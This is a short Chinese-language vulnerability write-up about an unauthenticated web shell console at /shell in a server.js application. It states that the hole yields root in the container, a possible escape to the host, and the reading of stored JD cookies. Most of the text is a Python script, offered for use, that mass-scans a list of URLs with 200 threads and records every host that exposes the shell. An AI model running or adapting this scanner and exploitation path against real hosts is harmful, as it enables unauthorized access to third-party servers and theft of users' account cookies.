0x01 漏洞检测
漏洞payload: http://IP/shell
0x02 漏洞验证
在server.js代码中, 使用了在线的shell控制台, 该控制台未进行鉴权, 导致存在未授权访问
通过该漏洞获取容器中的root权限, 可通过容器逃逸获取宿主机权限
读取的京东cookie
以下为批量脚本, 代码比较粗糙,大佬勿喷
# -*- coding: utf-8 -*-
# @Time : 2021/6/30 9:07
# @Author : AD钙奶
import json
import re
import time
import requests
import ssl
import threadpool
from loguru import logger
try:
requests.packages.urllib3.disable_warnings()
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
pass
else:
ssl._create_default_https_context = _create_unverified_https_context
def brute_force(_url):
urls = _url + '/shell'
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"Cookie": "",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59",
}
try:
resp = requests.get(url=urls, headers=headers, timeout=20)
if resp.status_code == 200 and resp.headers['Set-Cookie']:
info1 = f"系统存在未授权漏洞,存在漏洞的网站: {str(urls)}"
filename1 = time.strftime("%Y-%m-%d-") + 'vuln_存在未授权.txt'
save_vuln(filename1, info1)
logger.info(info1)
except Exception as e:
pass
def save_vuln(filename, info1):
file_path = './result/' + filename
with open(file_path, "a") as f:
info1 = info1 + '\n'
f.write(info1)
def open_file():
with open("url3.txt", 'r', encoding='UTF-8') as f:
urls = f.readlines()
urls = [url.strip() for url in urls if url and url.strip()]
return urls
def main():
url = open_file()
pool = threadpool.ThreadPool(200)
thread = threadpool.makeRequests(brute_force, url)
[pool.putRequest(req) for req in thread]
pool.wait()
if __name__ == '__main__':
main()